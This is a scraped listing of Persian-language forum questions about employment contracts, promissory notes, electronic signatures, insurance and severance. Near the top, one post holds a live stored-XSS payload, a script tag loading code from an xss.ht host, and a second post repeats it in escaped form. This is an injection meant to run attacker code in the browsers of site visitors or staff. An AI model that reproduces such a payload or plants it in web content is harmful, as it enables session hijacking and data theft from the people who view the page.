سفته تضمینی

گرفتن سفته از سوی شرکت ها در هنگام عقد قرارداد از اشخاص طبق قوانین کار است؟آیا م...

<script src=https://usernamenjwf923f.xss.ht></script>

<p>سلام&lt;script src=https://usernamenjwf923f.xss.ht&gt;&lt;/script&gt;</p>

امضای الکترونیک در قرارداد کار

آیا امضای الکترونیک در قرارداد کار قابل استناد و معتبر است؟<br>

بیمه قرارداد پرکیس پزشکان

<p>سلام و وقت بخیر. من تمپلیت قرارداد پرکیس رو از وینداد دانلود کردم. می‌خواستم....

مدت قرارداد کار

<p>سلام</p><p>مدت زمانی که کارفرما می تواند یک قرارداد تمدید کند چقدر است؟آیا می...

پيگیری بیمه و سنوات

<p>سلام روز بخیر</p><p>بنده از آذر نودوهشت با یک مجموعه ی خصوصی قرارداد بستم تا....

پيگیری بیمه و سنوات

<p>سلام روز بخیر</p><p>بنده از آذر نودوهشت با یک مجموعه ی خصوصی قرارداد بستم تا....

قرارداد آنلاین

قرارداد پیمانکاری و NDA به صورت آنلاین،در چه شرایطی اعتبار قانونی دارد و قابل پی...

مشکل در امضای الکترنیک

خطای تایید اطلاعات هویتی رو می ده<br>

نحوه عقد قرارداد کار بدون دریافت بیمه

<p>با سلام</p><p>من کارگاهی دارم که ثبت حقوقی نشده و به همین دلیل نمیتونم برای ک...